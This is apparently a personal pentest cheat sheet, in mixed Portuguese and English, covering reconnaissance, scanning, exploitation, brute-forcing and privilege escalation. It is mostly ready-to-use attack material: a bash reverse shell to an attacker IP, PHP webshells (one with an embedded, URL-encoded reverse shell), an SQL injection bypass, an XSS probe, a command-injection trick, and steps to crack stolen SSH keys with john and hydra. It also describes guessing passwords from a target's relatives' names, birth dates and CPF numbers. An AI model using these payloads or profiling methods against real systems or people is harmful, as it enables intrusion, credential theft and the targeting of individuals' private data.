#			Pentest script
		
# 1 - FootPrint:

	1 - whois ( owner, ownerid, nic-hdl-br, email, person )
	2 - Google ( dork : 'site:(país) + intexto("termo")'
	3 - The Harvester
	4 - Unsec ToolKit ( cpf, nome, cnpj )
	5 - Unsec Pass Breaker : {
		Get nic-hdl-br, data-nasc-target, 
		data-nasc-mãe , filhos ou esposa,
		numero de telefone, cpf. }
		!( mistura de datas também )!
		ex: mae+filho+esposa,
		    filho,esposa,mae
		    filho1+filho2+filho3
	            propriadata+esposa+filho, etc...
		
		mistura de iniciais e nomes também!!!
	6 - Consultas Telegram

# 2 - Scanning:
	
	1 - Nmap
	2 - Gobuster
	3 - ffuf
	4 - wp-scan
	5 - joomla scan
	6 - sublist3r
	7 - searchsploit

# 3 - Exploit:

	1 - searchsploit $service_name $version
	2 - msfconsole -> search $service_name $version
	3 - xplsearch -> $service_name $version
	4 - exploitdb -> site de busca de exploits
	5 - revshells -> Gerador de Shells for pwning
	6 - GTOF Bins -> Lista de binários escaláveis
	7 - Sploitus -> Lista de Exploits https://sploitus.com/

# 4 - Brute-force:

	1 - hydra
	2 -john the ripper

	

#			COMANDOS

#		WHOIS
 
	whoami@pentestbox$ whois $url


#		NMAP

	nmap -sV -T4 -vv -p- -Pn $ip | tee -a ports.txt

	nmap -sV -T4 -vv -Pn $ip -p- --min-rate 100000 | tee -a ports.txt
				
	nmap -sV -T3 -vv -Pn $ip -p- --min-rate 100000 | tee -a ports.txt

	nmap -sV -sC -vv -oA -Pn $ip -p- --min-rate 100000 | tee -a ports.txt


#		WEB RECON

	dirb http://$ip/ 
	
	gobuster -w /usr/share/SecLists/Discovery/Web-Content/common.txt -u http://$ip/		
	
	ffuf -u http://$ip/FUZZ -w /usr/share/SecLists/Discovery/Web-Content/raft-small-words.txt -fw 1

	ffuf -u http://$ip/FUZZ -w /usr/share/SecLists/Discovery/Web-Content/raft-large-files.txt -fw 1
	
	wpscan --url http://$url/

#		Wordlists list

	/usr/share/SecLists/Passwords/rockyou.txt	
	/usr/share/SecLists/Discovery/Web-Content/raft-large-files.txt
	/usr/share/SecLists/Discovery/Web-Content/quickhits.txt
	/usr/share/SecLists/Discovery/Web-Content/raft-small-words.txt


#		% BRUTE-FORCE HYDRA METHODS %

	1) hydra -l $login -P /usr/share/SecLists/rockyou.txt $ip ssh

	fonts https://initone.com.br/HydraBruteForce/


#		% BRUTE-FORCE JOHN METHODS %

	1) get the id_rsa in -> /home/$user/.ssh/id_rsa

	2) run ssh2john.py id_rsa > id_rsa.hash

	3) run john --wordlist=rockyou.txt id_rsa.hash
	
	4) get the password and run 'ssh -i id_rsa $root_user@$server_ip'
	
	5) [!!!] JACKPOT [!!!]


#			% PWN %

#	in Atacker shell
	
		1) ifconfig tun0

#	in victim shell or RCE failure
		
		1) sh -i >& /dev/tcp/$atacker_ip/6669 0>&1


#		webshells generator

		https://www.revshells.com/

#		STRINGS XPL

	# BREAK INDENTATION HTTP POST TO RCE

	USE THIS -> " ` $COMAND ` "

	#SQL BYPASS
	xpl' or 1=1#

	#php webshell RCE exploit

	1) <?php system($_GET['cmd']); ?>

	2) <?php system("sh -i >& /dev/tcp/$atacker_ip/6669 0>&1");?>

	3) <?php%20system("sh%20-i%20>&%20/dev/tcp/$atacker_ip/$port%200>&1");?>

	#xss
	<script>alert("XSS ON")</script>


#		STTY TERM

# 		In reverse shell
	python -c 'import pty; pty.spawn("/bin/bash")'
	Ctrl-Z

# 		In Ataccker shell
$ 	stty raw -echo
$ 	fg

# 		In reverse shell
	export TERM=xterm

#		nice font's about tty shells
 --> https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/


#		 PRIVILEGE ESCALATION

# 		find binaries with admin permissions
	-> sudo -l

# 		find binaries with admin permissions

	1 - find / -perm -4000 2>/dev/null
	2 - find / -user root -perm -4000 -exec ls -ldb {} \;
	3 - find / -perm -4000 2> /dev/null | xargs ls -lah

# 		find ssh keys
	-> ls .ssh/id_rsa


#		FAILURES TO ATEMPT

		1) XXE
		2) RCE
		3) LFI
		4) SQL
		5) XSS